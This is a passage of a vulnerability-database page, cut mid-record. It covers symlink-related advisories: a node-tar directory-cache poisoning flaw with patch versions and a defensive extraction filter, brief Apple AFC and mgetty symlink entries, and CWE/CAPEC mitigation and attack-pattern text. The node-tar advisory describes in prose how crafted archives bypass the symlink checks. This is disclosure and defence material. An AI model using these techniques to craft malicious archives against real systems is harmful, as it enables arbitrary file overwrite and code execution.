  "details": "### Impact\n\nArbitrary File Creation, Arbitrary File Overwrite, Arbitrary Code Execution\n\n`node-tar` aims to guarantee that any file whose location would be modified by a symbolic link is not extracted. This is, in part, achieved by ensuring that extracted directories are not symlinks. Additionally, in order to prevent unnecessary stat calls to determine whether a given path is a directory, paths are cached when directories are created.\n\nThis logic was insufficient when extracting tar files that contained both a directory and a symlink with the same name as the directory, where the symlink and directory names in the archive entry used backslashes as a path separator on posix systems. The cache checking logic used both `\\` and `/` characters as path separators, however `\\` is a valid filename character on posix systems.\n\nBy first creating a directory, and then replacing that directory with a symlink, it was thus possible to bypass node-tar symlink checks on directories, essentially allowing an untrusted tar file to symlink into an arbitrary location and subsequently extracting arbitrary files into that location, thus allowing arbitrary file creation and overwrite.\n\nAdditionally, a similar confusion could arise on case-insensitive filesystems.  If a tar archive contained a directory at `FOO`, followed by a symbolic link named `foo`, then on case-insensitive file systems, the creation of the symbolic link would remove the directory from the filesystem, but _not_ from the internal directory cache, as it would not be treated as a cache hit.  A subsequent file entry within the `FOO` directory would then be placed in the target of the symbolic link, thinking that the directory had already been created. \n\nThese issues were addressed in releases 4.4.16, 5.0.8 and 6.1.7.\n\nThe v3 branch of `node-tar` has been deprecated and did not receive patches for these issues. If you are still using a v3 release we recommend you update to a more recent version of `node-tar`. If this is not possible, a workaround is available below.\n\n### Patches\n\n4.4.16 || 5.0.8 || 6.1.7\n\n### Workarounds\n\nUsers may work around this vulnerability without upgrading by creating a custom filter method which prevents the extraction of symbolic links.\n\n```js\nconst tar = require(\u0027tar\u0027)\n\ntar.x({\n  file: \u0027archive.tgz\u0027,\n  filter: (file, entry) =\u003e {\n    if (entry.type === \u0027SymbolicLink\u0027) {\n      return false\n    } else {\n      return true\n    }\n  }\n})\n```\n\nUsers are encouraged to upgrade to the latest patched versions, rather than attempt to sanitize tar input themselves.\n\n### Fix\n\nThe problem is addressed in the following ways:\n\n1. All paths are normalized to use `/` as a path separator, replacing `\\` with `/` on Windows systems, and leaving `\\` intact in the path on posix systems.  This is performed in depth, at every level of the program where paths are consumed.\n2. Directory cache pruning is performed case-insensitively.  This _may_ result in undue cache misses on case-sensitive file systems, but the performance impact is negligible.\n\n#### Caveat\n\nNote that this means that the `entry` objects exposed in various parts of tar\u0027s API will now always use `/` as a path separator, even on Windows systems.  This is not expected to cause problems, as `/` is a valid path separator on Windows systems, but _may_ result in issues if `entry.path` is compared against a path string coming from some other API such as `fs.realpath()` or `path.resolve()`.\n\nUsers are encouraged to always normalize paths using a well-tested method such as `path.resolve()` before comparing paths to one another.",
  "id": "GHSA-9r2w-394v-53qc",
  "modified": "2021-08-31T16:01:50Z",
  "published": "2021-08-31T16:05:27Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/npm/node-tar/security/advisories/GHSA-9r2w-394v-53qc"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-37701"
    },
    {
      "type": "WEB",
      "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-389290.pdf"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/npm/node-tar"
    },
    {
      "type": "WEB",
      "url": "https://lists.debian.org/debian-lts-announce/2022/12/msg00023.html"
    },
    {
      "type": "WEB",
      "url": "https://www.debian.org/security/2021/dsa-5008"
    },
    {
      "type": "WEB",
      "url": "https://www.npmjs.com/package/tar"
    },
    {
      "type": "WEB",
      "url": "https://www.oracle.com/security-alerts/cpuoct2021.html"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Arbitrary File Creation/Overwrite via insufficient symlink protection due to directory cache poisoning using symbolic links"
}

GHSA-9R34-X38V-77C4

Vulnerability from github – Published: 2022-05-14 01:26 – Updated: 2022-05-14 01:26
VLAI
Details

Directory traversal vulnerability in afc in AppleFileConduit in Apple iOS before 8.1.3 and Apple TV before 7.0.3 allows attackers to access unintended filesystem locations by creating a symlink.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2014-4480"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-59"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2015-01-30T11:59:00Z",
    "severity": "HIGH"
  },
  "details": "Directory traversal vulnerability in afc in AppleFileConduit in Apple iOS before 8.1.3 and Apple TV before 7.0.3 allows attackers to access unintended filesystem locations by creating a symlink.",
  "id": "GHSA-9r34-x38v-77c4",
  "modified": "2022-05-14T01:26:15Z",
  "published": "2022-05-14T01:26:15Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2014-4480"
    },
    {
      "type": "WEB",
      "url": "http://lists.apple.com/archives/security-announce/2015/Jan/msg00000.html"
    },
    {
      "type": "WEB",
      "url": "http://lists.apple.com/archives/security-announce/2015/Jan/msg00001.html"
    },
    {
      "type": "WEB",
      "url": "http://support.apple.com/HT204245"
    },
    {
      "type": "WEB",
      "url": "http://support.apple.com/HT204246"
    },
    {
      "type": "WEB",
      "url": "http://www.securityfocus.com/bid/72334"
    },
    {
      "type": "WEB",
      "url": "http://www.securitytracker.com/id/1031652"
    }
  ],
  "schema_version": "1.4.0",
  "severity": []
}

GHSA-9R8X-J9WV-WVQV

Vulnerability from github – Published: 2022-05-17 02:18 – Updated: 2022-05-17 02:18
VLAI
Details

faxspool in mgetty 1.1.36 allows local users to overwrite arbitrary files via a symlink attack on a /tmp/faxsp.##### temporary file.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2008-4936"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-59"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2008-11-05T15:00:00Z",
    "severity": "MODERATE"
  },
  "details": "faxspool in mgetty 1.1.36 allows local users to overwrite arbitrary files via a symlink attack on a /tmp/faxsp.##### temporary file.",
  "id": "GHSA-9r8x-j9wv-wvqv",
  "modified": "2022-05-17T02:18:33Z",
  "published": "2022-05-17T02:18:33Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2008-4936"
    },
    {
      "type": "WEB",
      "url": "https://bugs.gentoo.org/show_bug.cgi?id=235770"
    },
    {
      "type": "WEB",
      "url": "https://bugs.gentoo.org/show_bug.cgi?id=235806"
    },
    {
      "type": "WEB",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/44833"
    },
    {
      "type": "WEB",
      "url": "http://bugs.debian.org/496403"
    },
    {
      "type": "WEB",
      "url": "http://dev.gentoo.org/~rbu/security/debiantemp/mgetty-fax"
    },
    {
      "type": "WEB",
      "url": "http://secunia.com/advisories/33051"
    },
    {
      "type": "WEB",
      "url": "http://security.gentoo.org/glsa/glsa-200812-08.xml"
    },
    {
      "type": "WEB",
      "url": "http://uvw.ru/report.lenny.txt"
    },
    {
      "type": "WEB",
      "url": "http://www.openwall.com/lists/oss-security/2008/10/30/2"
    },
    {
      "type": "WEB",
      "url": "http://www.securityfocus.com/bid/30927"
    }
  ],
  "schema_version": "1.4.0",
  "severity": []
}

Mitigation MIT-48.1
Architecture and Design

Strategy: Separation of Privilege

  • Follow the principle of least privilege when assigning access rights to entities in a software system.
  • Denying access to a file can prevent an attacker from replacing that file with a link to a sensitive file. Ensure good compartmentalization in the system to provide protected areas that can be trusted.
CAPEC-132: Symlink Attack

An adversary positions a symbolic link in such a manner that the targeted user or application accesses the link's endpoint, assuming that it is accessing a file with the link's name.

CAPEC-17: Using Malicious Files

An attack of this type exploits a system's configuration that allows an adversary to either directly access an executable file, for example through shell access; or in a possible worst case allows an adversary to upload a file and then execute it. Web servers, ftp servers, and message oriented middleware systems which have many integration points are particularly vulnerable, because both the programmers and the administrators must be in synch regarding the interfaces and the correct privileges for each interface.

CAPEC-35: Leverage Executable Code in Non-Executable Files

An attack of this type exploits a system's trust in configuration and resource files. When the executable loads the resource (such as an image file or configuration file) the attacker has modified the file to either execute malicious code directly or manipulate the target process (e.g. application server) to execute based on the malicious configuration parameters. Since systems are increasingly interrelated mashing up resources from local and remote sources the possibility of this attack occurring is high.

CAPEC-76: Manipulating Web Input to File System Calls

An attacker manipulates inputs to the target software which the target software passes to file system calls in the OS. The goal is to gain access to, and perhaps modify, areas of the file system that the target software did not intend to be accessible.